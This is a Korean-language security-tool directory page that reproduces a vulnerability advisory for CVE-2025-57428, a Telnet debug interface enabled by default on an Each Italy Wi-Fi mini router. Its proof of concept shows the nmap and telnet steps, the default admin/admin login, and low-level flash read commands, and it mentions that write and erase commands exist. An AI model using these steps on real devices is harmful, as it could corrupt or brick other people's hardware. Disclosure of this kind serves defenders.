Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-57428 — CVE-2025-57428 | Kitploit
도구/GitHubGitHub/5ulfur/cve-2025-57428
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationPenetration TestingHardware Security
GitHub5ulfur/cve-2025-57428

CVE-2025-57428

CVE-2025-57428

저장소 보기
16개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

⚠️ 이 저장소는 CVE-2025-57428에 대한 참고 자료로만 유지됩니다.
다른 권고 및 업데이트는 security-advisories를 참조하십시오.

CVE-2025-57428 - 기본적으로 활성화된 Telnet 디버그 인터페이스로 인해 저수준 플래시/레지스터 접근 가능

영향을 받는 제품

  • 공급업체/브랜드: Each Italy
  • 장치: Wireless Mini Router WIRELESS-N 300M
  • 펌웨어: v28K.MiniRouter.20190211

요약

이 장치는 Telnet 디버그 인터페이스를 (기본적으로 포트 23에서 활성화됨) 노출하며, 기본적으로 관리자 자격 증명(`admin`/`admin`)을 허용합니다. 인증 후 셸은 저수준 명령(특히 `spi` 및 `reg`)에 직접 접근할 수 있게 하여, 임의의 펌웨어 손상, 장치 벽돌화, 기능 또는 보안 구성 손실로 이어질 수 있습니다.


개념 증명

참고: 저는 파괴적 쓰기를 수행하는 명령을 의도적으로 생략합니다. 아래 PoC는 인터페이스의 존재와 접근 가능성을 확인하며, 즉시 사용 가능한 무기화된 익스플로잇을 제공하지 않습니다.

  1. LAN에서 장치를 스캔합니다:

    root@kitploit:~
    nmap -p 23 <device-ip>
    

    결과: 포트 23(telnet)이 open으로 표시됩니다.

  2. Telnet으로 연결하고 인증합니다(기본 자격 증명):

    root@kitploit:~
    telnet <device-ip>
    # Login as: admin
    # Password: admin
    

    로그인 후 디버그 프롬프트 CMD>가 표시됩니다.

  3. 사용 가능한 명령 나열:

    root@kitploit:~
    CMD>help
    

    도움말 출력에 다음 메뉴가 표시됩니다:

    root@kitploit:~
    cfg         net         os
    

    os 메뉴에 들어갑니다:

    root@kitploit:~
    CMD>os
    

    다시 사용 가능한 명령을 나열합니다:

    root@kitploit:~
    OS>help
    

    이번에는 도움말 출력에 다음 명령이 표시됩니다:

    root@kitploit:~
    thread      mem         spi         reg         cpuload     cpubusy     event
    

    spi를 사용하면 spi <rd/wr/er> <addr> [len]이 표시됩니다.

  4. 플래시 메모리 읽기:

    root@kitploit:~
    OS>spi rd 0x000fd0f0 16
    

    이 명령은 플래시 영역의 16진수 덤프를 반환합니다:

    root@kitploit:~
    4f30650a 938f56fa 1b663a19 e316d824
    

    이로써 명령이 작동하며 셸이 저수준 접근 권한을 가지고 있음을 확인합니다. 쓰기 명령(spi wr)과 지우기 명령(spi er), 그리고 reg 명령도 실행 가능합니다.

관찰 사항:

  • 웹 인터페이스를 통해 관리자 비밀번호를 변경하면 Telnet 자격 증명도 변경되며, 이는 공유 자격 증명을 나타냅니다.
  • Telnet은 초기 설정 후에도 기본적으로 활성화된 상태로 유지됩니다.

공급업체 커뮤니케이션

원래 공급업체의 보안 연락처 또는 지원 채널을 찾으려는 시도는 실패했습니다. 해당 제품은 출처를 알 수 없는 리브랜딩된 장치로 보입니다.

면책 조항

이 정보는 교육 및 방어 목적으로만 제공됩니다. 작성자는 이 정보의 오용에 대해 어떠한 책임도 지지 않습니다.

도구 다운로드